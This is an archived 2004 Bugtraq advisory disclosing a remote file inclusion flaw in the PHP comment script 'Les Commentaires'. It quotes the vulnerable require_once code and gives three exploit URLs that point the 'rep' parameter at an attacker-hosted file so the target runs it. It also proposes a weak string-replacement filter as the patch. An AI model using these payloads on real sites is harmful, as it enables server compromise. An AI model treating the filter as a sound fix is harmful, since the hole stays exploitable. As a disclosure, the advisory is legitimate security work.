lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20040203203054.7020.qmail@www.securityfocus.com>
Date: 3 Feb 2004 20:30:54 -0000
From: Himeur Nourredine <lostnoobs@...urity-challenge.com>
To: bugtraq@...urityfocus.com
Subject: Les Commentaires (PHP) Include file




Informations : 
°°°°°°°°°°°°°° 
Website : http://www.phpscripts-fr.net
Version : all
Problem : Include file 



PHP Code/Location : 
°°°°°°°°°°°°°°°°°°° 
config/fonctions.lib.php
derniers_commentaires.php
admin.php 
------------------------------------------------------------------ 
if (!isset($rep)) $rep = './';
require_once($rep.'config/fonctions.lib.php');
require_once($rep.'langues/'.$langue.'.lang.php');
------------------------------------------------------------------ 




Exploit : 
°°°°°°°°° 
http://[target]/config/fonctions.lib.php?rep=http://[attacker]/file.ext%3f
http://[target]/derniers_commentaires.php?rep=http://[attacker]/file.ext%3f
http://[target]/admin.php?rep=http://[attacker]/file.ext%3f


(the same but in local with = /langues/'.$langue.'.lang.php )


Patch : 
°°°°°°° 
You must to put a filter on the variable $rep and $langue.
like=
$rep= str_replace("..","lol",$rep);
AND
$rep= str_replace("://","lol",$rep);
(same with $langue)

Nourredine Himeur

www.security-challenge.com


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ